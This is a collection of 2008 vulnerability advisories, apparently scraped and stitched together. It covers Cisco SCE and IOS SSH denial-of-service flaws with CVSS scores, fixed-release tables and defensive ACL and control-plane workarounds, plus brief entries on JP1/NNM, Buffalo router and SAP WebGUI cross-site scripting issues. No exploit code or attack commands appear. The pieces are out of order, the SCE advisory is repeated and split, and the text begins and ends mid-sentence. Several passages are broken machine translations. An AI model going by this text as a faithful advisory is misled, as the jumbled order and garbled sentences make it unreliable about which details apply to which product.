should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. The following list contains the first fixed software release for each vulnerability: +---------------------------------------+ | | Affected | First | | Vulnerability | Major | Fixed | | | Release | Release | |------------------+----------+---------| | System | 1.x | 3.1.6 | |vulnerability to |----------+---------| | SSH login | 2.x | 3.1.6 | |activity |----------+---------| | | 3.x | 3.1.6 | |------------------+----------+---------| | | 1.x | 3.0.7 | |SSH login |----------+---------| | activity leads | 2.x | 3.0.7 | |to illegal IO |----------+---------| | operations | 3.x | 3.0.7, | | | | 3.1.0 | |------------------+----------+---------| | | 1.x | 3.1.6 | |SCE SSH |----------+---------| | authentication | 2.x | 3.1.6 | |sequence anomaly |----------+---------| | | 3.x | 3.1.6 | +---------------------------------------+ SCOS software version 3.1.6 contains the fixes for all vulnerabilities described in this document. SCOS software is available for download from the following location on cisco.com: http://www.cisco.com/pcgi-bin/tablebuild.pl/scos?psrtdcat20e2 Workarounds =========== There are no workarounds for these vulnerabilities. Restricting SCE SSH management interface access to only trusted devices through the use of SCE ACLs or Transit ACLs is strongly recommended. Additional information about SCE ACLs is available in the "Configuring the Management Interface and Security" section of the SCE Software Configuration Guide: http://www.cisco.com/en/US/products/ps6134/products_configuration_guide_chapter09186a00808498b9.html#wp1060396 Additional information about tACLs is available in Transit Access Control Lists: Filtering at Your Edge: http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. The SSH login activity vulnerability was discovered during the resolution of customer support cases. The illegal Input/Output operation and authentication sequence anomaly were discovered by Cisco during internal testing. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +------------------------------------------------------------+ | Revision 1.0 | 2008-May-21 | Initial public release. | +------------------------------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. +-------------------------------------------------------------------- Copyright 2007-2008 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- Updated: May 21, 2008 Document ID: 100706 +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFINE1U86n/Gc8U/uARAt0+AJ409BqcGWyfNNy1ZxGKj5m0IElUKwCdFCqC iNU22mLg2pFDqnDyLstihPI= =oKHO -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . flooding the vulnerable system with a large amount of packets

Multiple unspecified vulnerabilities in the SSH server in Cisco IOS 12.4 allow remote attackers to cause a denial of service (device restart) via unknown vectors, aka Bug ID (1) CSCsk42419, (2) CSCsk60020, and (3) CSCsh51293. Cisco IOS of SSH server There is a service disruption (DoS) There is a vulnerability that becomes a condition. The problem is Bug ID : CSCsk42419, CSCsk60020, CSCsh51293 It is a problem.Service disruption by a third party (DoS) There is a possibility of being put into a state. Successfully exploiting these issues allows remote attackers to generate spurious memory-access errors or cause the targeted device to reload. Repeated attacks will lead to denial-of-service conditions. These issues are tracked by Cisco Bug IDs CSCsk42419, CSCsk60020, and CSCsh51293. These issues affect devices running 12.4-based IOS releases that have SSH configured. Note that SSH is not configured by default. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. SOLUTION: Update to a fixed version (please see the vendor's advisory for details). PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080521-ssh.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-1159 has been assigned to this vulnerability. The IOS secure shell server is disabled by default. To determine if SSH is enabled, use the show ip ssh command. Router#show ip ssh SSH Enabled - version 2.0 Authentication timeout: 120 secs; Authentication retries: 3 The previous output shows that SSH is enabled on this device and that the SSH protocol major version that is being supported is 2.0. If the text "SSH Disabled" is displayed, the device is not vulnerable. Possible values for the SSH protocol version reported by IOS are: * 1.5: only SSH protocol version 1 is enabled * 1.99: SSH protocol version 2 with SSH protocol version 1 compatibility enabled * 2.0: only SSH protocol version 2 is enabled For more information about SSH versions in IOS, please check the following URL: http://www.cisco.com/en/US/docs/ios/12_3t/12_3t4/feature/guide/gt_ssh2.html The SSH server is not available in all IOS images. Devices that do not support SSH are not vulnerable. Please consult the table of fixed software in the Software Version and Fixes section for the specific 12.4-based IOS releases that are affected. To determine the software running on a Cisco product, log in to the device and issue the show version command to display the system banner. Cisco IOS software will identify itself as "Internetwork Operating System Software" or simply "IOS". The image name will be displayed between parentheses on the next line of output followed by "Version" and the IOS release name. Other Cisco devices will not have the show version command or will give different output. The following example identifies a Cisco product running IOS release 12.4(17): Cisco IOS Software, C2600 Software (C2600-ADVENTERPRISEK9-M), Version 12.4(17), RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2007 by Cisco Systems, Inc. Compiled Fri 07-Sep-07 16:05 by prod_rel_team ROM: System Bootstrap, Version 12.2(8r) [cmong 8r], RELEASE SOFTWARE (fc1) Router uptime is 1 week, 5 hours, 5 minutes System returned to ROM by power-on System image file is "flash:c2600-adventerprisek9-mz.124-17.bin" Additional information about Cisco IOS release naming is available at http://www.cisco.com/warp/public/620/1.html Products Confirmed Not Vulnerable +-------------------------------- Cisco devices that do not run IOS are not affected. IOS-XR images are not affected. The following IOS release trains are not affected: * 10-based releases * 11-based releases * 12.0-based releases * 12.1-based releases * 12.2-based releases * 12.3-based releases IOS releases prior to 12.4(7), 12.4(13d)JA, and 12.4(9)T are not affected by this vulnerability. No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Secure shell (SSH) was developed as a secure replacement for the telnet, ftp, rlogin, rsh, and rcp protocols, which allow for the remote access of devices. The main difference between SSH and older protocols is that SSH provides strong authentication, guarantees confidentiality, and uses encrypted transactions. A device with the SSH server enabled is vulnerable. These vulnerabilities are documented in Cisco Bug IDs: * CSCsk42419 ( registered customers only) * CSCsk60020 ( registered customers only) * CSCsh51293 ( registered customers only) Vulnerability Scoring Details ============================= Cisco is providing scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. Cisco will provide a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided an FAQ to answer additional questions regarding CVSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss * CSCsk42419 - SSHv2 spurious memory access CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsk60020 - SSHv2 spurious memory access CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsh51293 - Spurious memory access when SSH packets received CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities may result in a spurious memory access or, in certain cases, reload the device potentially resulting in a DoS condition. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center ("TAC") or your contracted maintenance provider for assistance. Each row of the Cisco IOS software table (below) describes a release train and the platforms or products for which it is intended. If a given release train is vulnerable, then the earliest possible releases that contain the fix (the "First Fixed Release") and the anticipated date of availability for each are listed in the "Rebuild" and "Maintenance" columns. A device running a release in the given train that is earlier than the release in a specific column (less than the First Fixed Release) is known to be vulnerable. The release should be upgraded at least to the indicated release or a later version (greater than or equal to the First Fixed Release label). For more information on the terms "Rebuild" and "Maintenance," consult the following URL: http://www.cisco.com/warp/public/620/1.html IOS releases prior to 12.4(7), 12.4(13d)JA, and 12.4(9)T are not affected by this vulnerability. +----------------------------------------+ | Major | Availability of Repaired | | Release | Releases | |------------+---------------------------| | Affected | First Fixed | Recommended | | 12.0-Based | Release | Release | | Releases | | | |----------------------------------------| | There are no affected 12.0 based | | releases | |----------------------------------------| | Affected | First Fixed | Recommended | | 12.1-Based | Release | Release | | Releases | | | |----------------------------------------| | There are no affected 12.1 based | | releases | |----------------------------------------| | Affected | First Fixed | Recommended | | 12.2-Based | Release | Release | | Releases | | | |----------------------------------------| | There are no affected 12.2 based | | releases | |----------------------------------------| | Affected | First Fixed | Recommended | | 12.3-Based | Release | Release | | Releases | | | |----------------------------------------| | There are no affected 12.3 based | | releases | |----------------------------------------| | Affected | First Fixed | Recommended | | 12.4-Based | Release | Release | | Releases | | | |------------+-------------+-------------| | | 12.4(13f) | | | | | | | | 12.4(16b) | | | 12.4 | | 12.4(18b) | | | 12.4(17a) | | | | | | | | 12.4(18) | | |------------+-------------+-------------| | | Only 12.4 | | | | (13d)JA and | | | | 12.4(13d) | | | | JA1 are | | | 12.4JA | vulnerable, | 12.4(16b) | | | all other | JA3 | | | 12.4JA | | | | releases | | | | are not | | | | affected. | | |------------+-------------+-------------| | 12.4JK | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4JMA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4JMB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4JMC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4JX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4MD | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4MR | 12.4(16)MR2 | 12.4(16)MR | |------------+-------------+-------------| | 12.4SW | 12.4(15)SW1 | 12.4(15)SW1 | |------------+-------------+-------------| | | 12.4(9)T6 | | | | | | | | 12.4(11)T4 | | | 12.4T | | 12.4(15)T5 | | | 12.4(15)T2 | | | | | | | | 12.4(20)T | | |------------+-------------+-------------| | 12.4XA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XD | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | | | 12.4XE | first fixed | 12.4(15)T5 | | | in 12.4T | | |------------+-------------+-------------| | | Vulnerable; | | | 12.4XF | first fixed | 12.4(15)T5 | | | in 12.4T | | |------------+-------------+-------------| | 12.4XG | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | | | 12.4XJ | first fixed | 12.4(15)T5 | | | in 12.4T | | |------------+-------------+-------------| | | Vulnerable; | | | 12.4XK | first fixed | 12.4(15)T5 | | | in 12.4T | | |------------+-------------+-------------| | 12.4XL | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XM | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XN | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XQ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XT | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XV | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | 12.4XW | 12.4(11)XW6 | 12.4(11)XW6 | |------------+-------------+-------------| | 12.4XY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XZ | Not | | | | Vulnerable | | +----------------------------------------+ Workarounds =========== If disabling the IOS SSH Server is not feasible, the following workarounds may be useful to some customers in their environments. Telnet +----- Telnet is not vulnerable to the issue described in this advisory and may be used as an insecure alternative to SSH. Telnet does not encrypt the authentication information or data; therefore, it should only be enabled for trusted local networks. VTY Access Class +--------------- It is possible to limit the exposure of the Cisco device by applying a VTY access class to allow only known, trusted hosts to connect to the device via SSH. For more information on restricting traffic to VTYs, please consult: http://cisco.com/en/US/products/sw/iosswrel/ps1835/products_command_reference_chapter09186a00800873c8.html#wp1017389 The following example permits access to VTYs from the 192.168.1.0/24 netblock and the single IP address 172.16.1.2 while denying access from anywhere else: Router(config)# access-list 1 permit 192.168.1.0 0.0.0.255 Router(config)# access-list 1 permit host 172.16.1.2 Router(config)# line vty 0 4 Router(config-line)# access-class 1 in Different Cisco platforms support different numbers of terminal lines. Check your device's configuration to determine the correct number of terminal lines for your platform. Infrastructure ACLs (iACL) +------------------------- Although it is often difficult to block traffic transiting your network, it is possible to identify traffic that should never be allowed to target your infrastructure devices and block that traffic at the border of your network. Infrastructure ACLs are considered a network security best practice and should be considered as a long-term addition to good network security as well as a workaround for this specific vulnerability. The ACL example shown below should be included as part of the deployed infrastructure access-list, which will protect all devices with IP addresses in the infrastructure IP address range. A sample access list for devices running Cisco IOS is below: !--- Permit SSH services from trusted hosts destined !--- to infrastructure addresses. access-list 150 permit tcp TRUSTED_HOSTS MASK INFRASTRUCTURE_ADDRESSES MASK eq 22 !--- Deny SSH packets from all other sources destined to infrastructure addresses. access-list 150 deny tcp any INFRASTRUCTURE_ADDRESSES MASK eq 22 !--- Permit all other traffic to transit the device. access-list 150 permit IP any any interface serial 2/0 ip access-group 150 in The white paper titled "Protecting Your Core: Infrastructure Protection Access Control Lists" presents guidelines and recommended deployment techniques for infrastructure protection access lists. This white paper can be obtained here: http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801a1a55.shtml Control Plane Policing (CoPP) +---------------------------- The Control Plane Policing (CoPP) feature may be used to mitigate these vulnerabilities. In the following example, only SSH traffic from trusted hosts and with 'receive' destination IP addresses is permitted to reach the route processor (RP). Note: Dropping traffic from unknown or untrusted IP addresses may affect hosts with dynamically assigned IP addresses from connecting to the Cisco IOS device. access-list 152 deny tcp TRUSTED_ADDRESSES MASK any eq 22 access-list 152 permit tcp any any eq 22 ! class-map match-all COPP-KNOWN-UNDESIRABLE match access-group 152 ! ! policy-map COPP-INPUT-POLICY class COPP-KNOWN-UNDESIRABLE drop ! control-plane service-policy input COPP-INPUT-POLICY In the above CoPP example, the ACL entries that match the exploit packets with the "permit" action result in these packets being discarded by the policy-map "drop" function, while packets that match the "deny" action are not affected by the policy-map drop function. CoPP is available in Cisco IOS release trains 12.0S, 12.2SX, 12.2S, 12.3T, 12.4, and 12.4T. Additional information on the configuration and use of the CoPP feature can be found at the following URL: http://www.cisco.com/en/US/prod/collateral/iosswrel/ps6537/ps6586/ps6642/prod_white_paper0900aecd804fa16a.html Obtaining Fixed Software ======================== Cisco has made free software available to address this vulnerability for affected customers. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/public/sw-license-agreement.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact either "psirt@cisco.com" or "security-alert@cisco.com" for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com Customers using Third-party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreement with third-party support organizations such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but who do not hold a Cisco service contract and customers who purchase through third-party vendors but are unsuccessful at obtaining fixed software through their point of sale should get their upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Have your product serial number available and give the URL of this notice as evidence of your entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including special localized telephone numbers and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. This vulnerability was discovered by Cisco internal testing and customer service requests. Status of This Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at http://www.cisco.com/warp/public/707/cisco-sa-20080521-ssh.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2008-May-21 | public | | | | release. | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (Darwin) iEYEARECAAYFAkg0RSMACgkQ86n/Gc8U/uCX8QCaA9y2y/y0uC1DPonlJwMGR1Kd jaMAnAz/4J+L7nxWxhppehcJsr0bGmsA =WzxB -----END PGP SIGNATURE-----

The JP1/Cm2/Network Node Manager (NNM) has vulnerability that can be exploited to cause a denial of service (DoS). A remote attacker could cause a denial of service (DoS).

Some Buffalo routers have a vulnerability that could allow remote access from the WAN side. A remote attacker could exploit this vulnerability to manipulate a router by gaining administrative privileges. By accessing the management interface, a remote attacker could also obtain user's account and password information of the ISP using the save settings function.Configurations could be changed by the remote attacker. As the save configuration stores user's account and password information of ISPs in plain-text format, a remote attacker could steal such information and impersonate a user to gain illegal access.

Cross-site scripting (XSS) vulnerability in the Web GUI in SAP Web Application Server (WAS) 7.0, Web Dynpro for ABAP (aka WD4A or WDA), and Web Dynpro for BSP allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the default URI under bc/gui/sap/its/webgui/. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. SAP Web Application Server 7.0 is vulnerable; other versions may also be affected. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. Input passed via the URL to the sap/bc/gui/sap/its/webgui/ is not properly sanitised before being returned to the user. The vulnerability is reported in the SAP software components SAP_BASIS 640, 700, 701, and 710. SOLUTION: A solution is available via SAP note 1136770. PROVIDED AND/OR DISCOVERED BY: Digital Security Research Group, dsec.ru ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in the SSH server in (1) Cisco Service Control Engine (SCE) before 3.1.6, and (2) Icon Labs Iconfidant SSH before 2.3.8, allows remote attackers to cause a denial of service (device instability) via "SSH credentials that attempt to change the authentication method," aka Bug ID CSCsm14239. The most severe of these issues may allow an attacker to cause a vulnerable system to crash. Icon Labs Provided by Iconfidant SSH There are multiple vulnerabilities in the server. Icon Labs Provided by Iconfidant SSH Is an authentication protocol provided for embedded systems (SSH) is. Iconfidant SSH There are multiple vulnerabilities in the server.Service disruption from a remote third party (DoS) Under attack or server SSH May not be accepted. Cisco SCE (Service Control Engine) devices are prone to multiple denial-of-service vulnerabilities. Attackers can leverage these issues to disrupt system stability or cause devices to reload. Successful exploits will deny service to legitimate users. SCE devices running versions prior to SCOS (Service Control Operating System) 3.1.6 may be affected. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. SOLUTION: Update to version 3.1.6. http://www.cisco.com/pcgi-bin/tablebuild.pl/scos PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. The first vulnerability may be triggered during SSH login activity that is conducted within aggressive time frames. The second vulnerability may be triggered with normal SSH login activity in combination with other SCE management actions occurring simultaneously. The third vulnerability may be triggered during SSH login and is specific to the usage of unique invalid authentication credentials. Cisco has made free upgrade software available to address these vulnerabilities for affected customers. There are no workarounds for these vulnerabilities. Note: These vulnerabilities are independent of each other; a device may be affected by one vulnerability and not by the others. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml. Note: The SCE SSH server is disabled by default. The following example shows a Cisco SCE that runs software release 3.1.6: SCE2000#>show version System version: Version 3.1.6 Build 157 Build time: Mar 31 2008, 18:58:49 (Change-list 303626) Software version is: Version 3.1.6 Build 157 Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco SCE 1000 and 2000 series devices provide high-capacity advanced application-level bandwidth optimization, stateful application inspection, session-based classification and control of network traffic. The SCE solution allows for the detection and control of network applications including: web browsing, multimedia streaming, and peer-to-peer (P2P). This Security Advisory describes multiple distinct vulnerabilities. These vulnerabilities are independent of each other. * System vulnerability to SSH login activity A vulnerability impacting the SCE SSH server may be triggered during SSH login activity, resulting in system instability or a reload of the SCE. Specific SSH processes may encounter temporary resource unavailability if called within aggressive intervals. This vulnerability is documented in Cisco Bug ID CSCsi68582 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-0534. * SSH login activity leads to illegal Input/Output operations A second vulnerability exists in the SCE SSH server that may be triggered with normal SSH traffic to the SCE management interface occurring in conjunction with other management tasks. During this event, an illegal IO operation may impact the SCE management agent, requiring a reboot of the SCE to recover management access. This vulnerability is documented in Cisco Bug ID CSCsh49563 and has been assigned CVE ID CVE-2008-0536. * SCE SSH authentication sequence anomaly A third vulnerability exists in the SCE SSH server that may also be triggered during the SSH login process but unrelated to login attempt frequency or other concurrent management tasks. This issue is triggered by the usage of specific SSH credentials that attempt to change the authentication method, resulting in an authentication sequence anomaly impacting system stability. This vulnerability is documented in Cisco Bug ID CSCsm14239 and has been assigned CVE ID CVE-2008-0535. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding VSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html. Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss. * System vulnerability to SSH login activity (CSCsi68582) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * SSH login activity leads to illegal I/O operations (CSCsh49563) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * SCE SSH authentication sequence anomaly (CSCsm14239) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these 